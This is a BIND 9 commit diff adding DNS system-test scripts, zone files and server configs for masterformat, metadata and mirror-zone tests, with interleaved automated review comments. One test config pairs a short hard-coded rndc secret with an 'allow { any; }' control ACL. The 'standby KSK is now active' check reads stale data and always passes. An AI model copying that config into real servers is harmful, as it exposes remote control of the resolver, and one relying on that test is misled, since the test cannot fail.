flush before shutdown +stop_server --use-rndc --port ${CONTROLPORT} ns3 +rm ns3/*.jnl +restart +#shellcheck disable=SC2034 +for i in 0 1 2 3 4 5 6 7 8 9; do + lret=0 + dig_with_opts +comm @10.53.0.3 moretext.dynamic txt > "dig.out.dynamic2.ns3.test$n" + grep "more text" "dig.out.dynamic2.ns3.test$n" > /dev/null 2>&1 || lret=1 + [ $lret -eq 0 ] && break; +done +[ $lret -eq 1 ] && ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# stomp on the file header +echo_i "checking corrupt map files fail to load (bad file header) ($n)" +ret=0 +$CHECKZONE -D -f text -F map -o map.5 example.nil baseline.txt > /dev/null +cp map.5 badmap +stomp badmap 0 32 99 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# stomp on the file data so it hashes differently. 
+# these are small and subtle changes, so that the resulting file +# would appear to be a legitimate map file and would not trigger an +# assertion failure if loaded into memory, but should still fail to +# load because of a SHA1 hash mismatch. +echo_i "checking corrupt map files fail to load (bad node header) ($n)" +ret=0 +cp map.5 badmap +stomp badmap 2754 2 99 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking corrupt map files fail to load (bad node data) ($n)" +ret=0 +cp map.5 badmap +stomp badmap 2897 5 127 +$CHECKZONE -D -f map -F text -o text.5 example.nil badmap > /dev/null +[ $? = 1 ] || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format zone is scheduled for resigning (compilezone) ($n)" +ret=0 +rndccmd 10.53.0.1 zonestatus signed > rndc.out 2>&1 || ret=1 +grep 'next resign' rndc.out > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +echo_i "checking map format zone is scheduled for resigning (signzone) ($n)" +ret=0 +rndccmd 10.53.0.1 freeze signed > rndc.out 2>&1 || ret=1 +(cd ns1 || exit 1; $SIGNER -S -O map -f signed.db.map -o signed signed.db > /dev/null) +rndc_reload ns1 10.53.0.1 signed +rndccmd 10.53.0.1 zonestatus signed > rndc.out 2>&1 || ret=1 +grep 'next resign' rndc.out > /dev/null 2>&1 || ret=1 +n=$((n+1)) +[ $ret -eq 0 ] || echo_i "failed" +status=$((status+ret)) + +# The following test is disabled by default because it is very slow. +# It fails on Windows, because a single read() call (specifically +# the one in isc_file_mmap()) cannot process more than INT_MAX (2^31) +# bytes of data. 
+if [ -n "${TEST_LARGE_MAP}" ]; then + echo_i "checking map file size > 2GB can be loaded ($n)" + ret=0 + $PERL ../../startperf/mkzonefile.pl test 9000000 > text.$n + # convert to map + $CHECKZONE -D -f text -F map -o map.$n test text.$n > /dev/null || ret=1 + # check map file size is over 2GB to ensure the test is valid + size=$(ls -l map.$n | awk '{print $5}') + [ "$size" -gt 2147483648 ] || ret=1 + # convert back to text + $CHECKZONE -f map test map.$n > /dev/null || ret=1 + n=$((n+1)) + [ $ret -eq 0 ] || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/metadata/child.db b/bin/tests/system/metadata/child.db new file mode 100644 index 0000000..35fff9c --- /dev/null +++ b/bin/tests/system/metadata/child.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 20 +child.parent.nil IN SOA ns.child.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns.child.parent.nil. +$ORIGIN child.parent.nil. +$TTL 300 ; 5 minutes +ns A 10.53.0.3 diff --git a/bin/tests/system/metadata/clean.sh b/bin/tests/system/metadata/clean.sh new file mode 100644 index 0000000..58cd7ce --- /dev/null +++ b/bin/tests/system/metadata/clean.sh 
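Review bot: Both format-transition checks in masterformat/tests.sh end in `cmp -s baseline.txt text.1 || ret=0` (and `text.2` in the second check), which assigns the value `ret` already holds, so a round trip that alters the zone can never fail the test. These should read `cmp -s baseline.txt text.1 || ret=1` and `cmp -s baseline.txt text.2 || ret=1`. The `$CHECKZONE` conversions in the same two checks also run without `|| ret=1`, so a failed conversion is not recorded either. Since these checks sit next to the corrupt-map-file tests, they are the only coverage that the raw and map loaders reproduce the text zone exactly, and as written they always pass.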
@@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f K* dsset-* *.signed *.new +rm -f zsk.key ksk.key parent.ksk.key parent.zsk.key +rm -f pending.key rolling.key standby.key inact.key +rm -f prerev.key postrev.key oldstyle.key +rm -f keys sigs +rm -f tmp.out +rm -f settime1.test* settime2.test* +rm -f ns*/named.lock diff --git a/bin/tests/system/metadata/parent.db b/bin/tests/system/metadata/parent.db new file mode 100644 index 0000000..a5484e3 --- /dev/null +++ b/bin/tests/system/metadata/parent.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +parent.nil IN SOA ns1.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1.parent.nil. + NS ns2.parent.nil. +$ORIGIN parent.nil. +$TTL 3600 ; 1 hour +a A 1.1.1.1 +$TTL 300 ; 5 minutes +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + +child NS ns.child +ns.child A 10.53.0.3 diff --git a/bin/tests/system/metadata/setup.sh b/bin/tests/system/metadata/setup.sh new file mode 100644 index 0000000..fd9ac60 --- /dev/null +++ b/bin/tests/system/metadata/setup.sh 
@@ -0,0 +1,61 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +pzone=parent.nil +czone=child.parent.nil + +echo_i "generating keys" + +# active zsk +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $czone) +echo $zsk > zsk.key + +# not yet published or active +pending=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P none -A none $czone) +echo $pending > pending.key + +# published but not active +standby=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A none $czone) +echo $standby > standby.key + +# inactive +inact=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now-24h -A now-24h -I now $czone) +echo $inact > inact.key + +# active ksk +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +echo $ksk > ksk.key + +# published but not YET active; will be active in 15 seconds +rolling=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +$SETTIME -A now+15s $rolling > /dev/null +echo $rolling > rolling.key + +# revoked +revoke1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +echo $revoke1 > prerev.key +revoke2=$($REVOKE $revoke1) +echo $revoke2 | sed -e 's#\./##' -e "s/\.key.*$//" > postrev.key + +pzsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $pzone) +echo $pzsk > parent.zsk.key + +pksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $pzone) +echo $pksk > parent.ksk.key + +oldstyle=$($KEYGEN -Cq -a ${DEFAULT_ALGORITHM} $pzone) +echo $oldstyle > oldstyle.key + diff --git a/bin/tests/system/metadata/tests.sh b/bin/tests/system/metadata/tests.sh new file mode 100644 index 0000000..626559d --- /dev/null +++ b/bin/tests/system/metadata/tests.sh 
@@ -0,0 +1,213 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +pzone=parent.nil pfile=parent.db +czone=child.parent.nil cfile=child.db +status=0 +n=1 + +echo_i "setting key timers" +$SETTIME -A now+15s $(cat rolling.key) > /dev/null + +inact=$(keyfile_to_key_id "$(cat inact.key)") +ksk=$(keyfile_to_key_id "$(cat ksk.key)") +pending=$(keyfile_to_key_id "$(cat pending.key)") +postrev=$(keyfile_to_key_id "$(cat postrev.key)") +prerev=$(keyfile_to_key_id "$(cat prerev.key)") +rolling=$(keyfile_to_key_id "$(cat rolling.key)") +standby=$(keyfile_to_key_id "$(cat standby.key)") +zsk=$(keyfile_to_key_id "$(cat zsk.key)") + +echo_i "signing zones" +$SIGNER -Sg -o $czone $cfile > /dev/null +$SIGNER -Sg -o $pzone $pfile > /dev/null + +awk '$2 ~ /RRSIG/ { + type = $3; + getline; + id = $3; + if ($4 ~ /'${czone}'/) { + print type, id + } +}' < ${cfile}.signed > sigs + +awk '$2 ~ /DNSKEY/ { + flags = $3; + while ($0 !~ /key id =/) + getline; + id = $NF; + print flags, id; +}' < ${cfile}.signed > keys + +echo_i "checking that KSK signed DNSKEY only ($n)" +ret=0 +grep "DNSKEY $ksk"'$' sigs > /dev/null || ret=1 +grep "SOA $ksk"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that ZSK signed ($n)" +ret=0 +grep "SOA $zsk"'$' sigs > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that standby ZSK did not sign ($n)" +ret=0 +grep " $standby"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 
]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that inactive key did not sign ($n)" +ret=0 +grep " $inact"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that pending key was not published ($n)" +ret=0 +grep " $pending"'$' keys > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that standby KSK did not sign but is delegated ($n)" +ret=0 +grep " $rolling"'$' sigs > /dev/null && ret=1 +grep " $rolling"'$' keys > /dev/null || ret=1 +grep -E "DS[ ]*$rolling[ ]" ${pfile}.signed > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that key was revoked ($n)" +ret=0 +grep " $prerev"'$' keys > /dev/null && ret=1 +grep " $postrev"'$' keys > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that revoked key self-signed ($n)" +ret=0 +grep "DNSKEY $postrev"'$' sigs > /dev/null || ret=1 +grep "SOA $postrev"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "waiting 20 seconds for key changes to occur" +sleep 20 + +echo_i "re-signing zone" +$SIGNER -Sg -o $czone -f ${cfile}.new ${cfile}.signed > /dev/null + +echo_i "checking that standby KSK is now active ($n)" +ret=0 +grep "DNSKEY $rolling"'$' sigs > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking update of an old-style key ($n)" +ret=0 +# printing metadata should not work with an old-style key +$SETTIME -pall $(cat oldstyle.key) > /dev/null 2>&1 && ret=1 +$SETTIME -f $(cat oldstyle.key) > /dev/null 2>&1 || ret=1 +# but now it should +$SETTIME -pall $(cat oldstyle.key) > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi 
+status=$((status + ret)) + +echo_i "checking warning about permissions change on key with dnssec-settime ($n)" +uname=$(uname -o 2> /dev/null) +if [ Cygwin = "$uname" ]; then + echo_i "Cygwin detected, skipping" +else + ret=0 + # settime should print a warning about changing the permissions + chmod 644 $(cat oldstyle.key).private + $SETTIME -P none $(cat oldstyle.key) > settime1.test$n 2>&1 || ret=1 + grep "warning: Permissions on the file.*have changed" settime1.test$n > /dev/null 2>&1 || ret=1 + $SETTIME -P none $(cat oldstyle.key) > settime2.test$n 2>&1 || ret=1 + grep "warning: Permissions on the file.*have changed" settime2.test$n > /dev/null 2>&1 && ret=1 + n=$((n + 1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +echo_i "checking warning about delete date < inactive date with dnssec-settime ($n)" +ret=0 +# settime should print a warning about delete < inactive +$SETTIME -I now+15s -D now $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking no warning about delete date < inactive date with dnssec-settime when delete date is unset ($n)" +ret=0 +$SETTIME -D none $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +$SETTIME -p all $(cat oldstyle.key) > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking warning about delete date < inactive date with dnssec-keygen ($n)" +ret=0 +# keygen should print a warning about delete < inactive +$KEYGEN -q -a ${DEFAULT_ALGORITHM} -I now+15s -D now $czone > tmp.out 2>&1 || ret=1 +grep "warning" tmp.out > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking correct behavior setting activation without publication date ($n)" +ret=0 +key=$($KEYGEN -q -a 
${DEFAULT_ALGORITHM} -A +1w $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +act=$($SETTIME -upA $key | awk '{print $2}') +[ $pub -eq $act ] || ret=1 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A +1w -i 1d $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +act=$($SETTIME -upA $key | awk '{print $2}') +[ $pub -lt $act ] || ret=1 +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A +1w -P never $czone) +pub=$($SETTIME -upP $key | awk '{print $2}') +[ $pub = "UNSET" ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking calculation of dates for a successor key ($n)" +ret=0 +oldkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $czone) +newkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -q $czone) +$SETTIME -A -2d -I +2d $oldkey > settime1.test$n 2>&1 || ret=1 +$SETTIME -i 1d -S $oldkey $newkey > settime2.test$n 2>&1 || ret=1 +$SETTIME -pA $newkey | grep "1970" > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/mirror/README b/bin/tests/system/mirror/README new file mode 100644 index 0000000..f76b41b --- /dev/null +++ b/bin/tests/system/mirror/README 
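Review bot: The check "checking that standby KSK is now active" in metadata/tests.sh greps the `sigs` file, which was built from `${cfile}.signed` before the 20-second wait; the re-sign writes `${cfile}.new` and nothing regenerates `sigs` from it. As written, `grep "DNSKEY $rolling"'$' sigs > /dev/null && ret=1` repeats the earlier "did not sign" assertion on stale data and passes whether or not the key was activated. I would rebuild the signature list from `${cfile}.new` with the same awk filter used earlier and assert presence, `grep "DNSKEY $rolling"'$' sigs > /dev/null || ret=1`, assuming the intent matches the test's title.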
@@ -0,0 +1,26 @@
+<!--
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+-->
+
+This test checks whether zones configured with "type mirror;" behave as
+expected.
+
+ns1 is an authoritative-only server. It only serves the root zone, which is
+mirrored by ns3.
+
+ns2 is an authoritative-only server. It serves a number of zones, some of which
+are delegated to it by ns1 and used in recursive resolution tests aimed at ns3
+while others are only served so that ns3 has a primary server to mirror zones
+from during various tests of the mirror zone implementation.
+
+ns3 is a recursive resolver. It has a number of mirror zones configured. This
+is the only server whose behavior is being examined by this system test.
diff --git a/bin/tests/system/mirror/clean.sh b/bin/tests/system/mirror/clean.sh
new file mode 100644
index 0000000..2e02183
--- /dev/null
+++ b/bin/tests/system/mirror/clean.sh
@@ -0,0 +1,30 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */*.conf
+rm -f */*.db
+rm -f */*.jnl
+rm -f */*.mirror
+rm -f */*.nzd*
+rm -f */*.prev
+rm -f */*.signed
+rm -f */K*
+rm -f */db-*
+rm -f */dsset-*
+rm -f */jn-*
+rm -f */_default.nzf
+rm -f */managed-keys.bind*
+rm -f */named.memstats
+rm -f */named.run
+rm -f dig.out.*
+rm -f rndc.out.*
diff --git a/bin/tests/system/mirror/ns1/named.conf.in b/bin/tests/system/mirror/ns1/named.conf.in
new file mode 100644
index 0000000..5334786
--- /dev/null
+++ b/bin/tests/system/mirror/ns1/named.conf.in
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
diff --git a/bin/tests/system/mirror/ns1/root.db.in b/bin/tests/system/mirror/ns1/root.db.in
new file mode 100644
index 0000000..98ecf1f
--- /dev/null
+++ b/bin/tests/system/mirror/ns1/root.db.in
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA a.root-servers.nil. hostmaster 1 3600 1200 604800 3600
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+example NS ns2.example.
+ns2.example. A 10.53.0.2
+initially-unavailable. NS ns2.initially-unavailable.
+ns2.initially-unavailable. A 10.53.0.2
diff --git a/bin/tests/system/mirror/ns1/sign.sh b/bin/tests/system/mirror/ns1/sign.sh
new file mode 100644
index 0000000..c3affbf
--- /dev/null
+++ b/bin/tests/system/mirror/ns1/sign.sh
@@ -0,0 +1,38 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+( cd ../ns2 && $SHELL -e sign.sh )
+
+cp ../ns2/dsset-* .
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null)
+keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null)
+
+cat $infile $keyname1.key $keyname2.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+# Add a trust anchor for a name whose non-existence can be securely proved
+# without recursing when the root zone is mirrored. This will exercise code
+# attempting to send TAT queries for such names (in ns3). Key data is
+# irrelevant here, so just reuse the root zone key generated above.
+sed "s/^\./nonexistent./;" $keyname1.key > $keyname1.modified.key
+
+keyfile_to_static_ds $keyname1 $keyname1.modified > trusted.conf
diff --git a/bin/tests/system/mirror/ns2/example.db.in b/bin/tests/system/mirror/ns2/example.db.in
new file mode 100644
index 0000000..5472399
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/example.db.in
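Review bot: Both `$KEYGEN` command substitutions send stderr to `/dev/null`, so when key generation fails the script stops under `#!/bin/sh -e` without printing any reason, and setup.sh only sees a non-zero exit from `( cd ns1 && $SHELL -e sign.sh )`. Keeping the diagnostics makes a broken crypto build or an unsupported `${DEFAULT_ALGORITHM}` visible in the test log. If the redirection is there only to hide progress output, the `-q` flag that other system tests already pass to `$KEYGEN` should do that (worth confirming it leaves error messages intact): `keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK $zone)`. The ns2/sign.sh hunk uses the same `2> /dev/null` pattern on every `$KEYGEN` call.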
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns2 hostmaster 1 3600 1200 604800 3600
+@ NS ns2
+ns2 A 10.53.0.2
+foo A 127.0.0.1
+sub NS ns2
diff --git a/bin/tests/system/mirror/ns2/initially-unavailable.db.in b/bin/tests/system/mirror/ns2/initially-unavailable.db.in
new file mode 100644
index 0000000..cf809e3
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/initially-unavailable.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA a.root-servers.nil. hostmaster 1 3600 1200 604800 3600
+@ NS ns2
+ns2 A 10.53.0.2
+foo CNAME foo.example.
diff --git a/bin/tests/system/mirror/ns2/named.conf.in b/bin/tests/system/mirror/ns2/named.conf.in
new file mode 100644
index 0000000..5df56c2
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/named.conf.in
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+};
+
+zone "sub.example" {
+ type primary;
+ file "sub.example.db.signed";
+};
+
+zone "initially-unavailable" {
+ type primary;
+ file "initially-unavailable.db.signed";
+ allow-transfer { 10.53.0.254; };
+};
+
+zone "verify-addzone" {
+ type primary;
+ file "verify-addzone.db.original.signed";
+};
+
+zone "verify-axfr" {
+ type primary;
+ file "verify-axfr.db.signed";
+};
+
+zone "verify-csk" {
+ type primary;
+ file "verify-csk.db.signed";
+};
+
+zone "verify-ixfr" {
+ type primary;
+ file "verify-ixfr.db.signed";
+ ixfr-from-differences yes;
+ allow-transfer { 10.53.0.3; };
+};
+
+zone "verify-reconfig" {
+ type primary;
+ file "verify-reconfig.db.signed";
+};
+
+zone "verify-unsigned" {
+ type primary;
+ file "verify.db.in";
+};
+
+zone "verify-untrusted" {
+ type primary;
+ file "verify-untrusted.db.signed";
+};
diff --git a/bin/tests/system/mirror/ns2/sign.sh b/bin/tests/system/mirror/ns2/sign.sh
new file mode 100644
index 0000000..2c48f22
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/sign.sh
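Review bot: The `controls` statement accepts rndc connections with `allow { any; }` and authenticates them with the literal secret `"1234abcd8765"` in `key rndc_key`, and nothing in the file marks either as a throwaway test fixture. For a listener bound to the 10.53.0.2 test address that is workable, but a short clear-text key next to an open ACL is the kind of block that gets copied into real configurations. I would add a comment above the key, for example `/* Fixed, publicly known key for the system-test harness only; never use on a reachable server. */`. The ns3/named.conf.in hunk in this commit carries the same key and the same `allow { any; }` and wants the same comment. Separately, a one-line comment on `allow-transfer { 10.53.0.254; };` in the "initially-unavailable" zone saying that transfers to ns3 are refused on purpose until tests.sh rewrites the address would stop someone from "fixing" it.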
@@ -0,0 +1,80 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+keys_to_trust=""
+
+for zonename in sub.example example initially-unavailable; do
+ zone=$zonename
+ infile=$zonename.db.in
+ zonefile=$zonename.db
+
+ keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null)
+ keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null)
+
+ cat $infile $keyname1.key $keyname2.key > $zonefile
+
+ $SIGNER -P -g -o $zone $zonefile > /dev/null
+done
+
+# Only add the key for "initially-unavailable" to the list of keys trusted by
+# ns3. "example" is expected to be validated using a chain of trust starting in
+# the "root" zone on ns1.
+keys_to_trust="$keys_to_trust $keyname1"
+
+# Prepare a zone signed using a Combined Signing Key (CSK) without the SEP bit
+# set and add that key to the list of keys to trust.
+zone=verify-csk
+infile=verify.db.in
+zonefile=verify-csk.db
+
+keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null)
+cat $infile $keyname.key > $zonefile
+$SIGNER -P -o $zone $zonefile > /dev/null
+keys_to_trust="$keys_to_trust $keyname"
+
+# Prepare remaining zones used in the test.
+ORIGINAL_SERIAL=$(awk '$2 == "SOA" {print $5}' verify.db.in)
+UPDATED_SERIAL_BAD=$((ORIGINAL_SERIAL + 1))
+UPDATED_SERIAL_GOOD=$((ORIGINAL_SERIAL + 2))
+
+for variant in addzone axfr ixfr load reconfig untrusted; do
+ zone=verify-$variant
+ infile=verify.db.in
+ zonefile=verify-$variant.db
+
+ keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null)
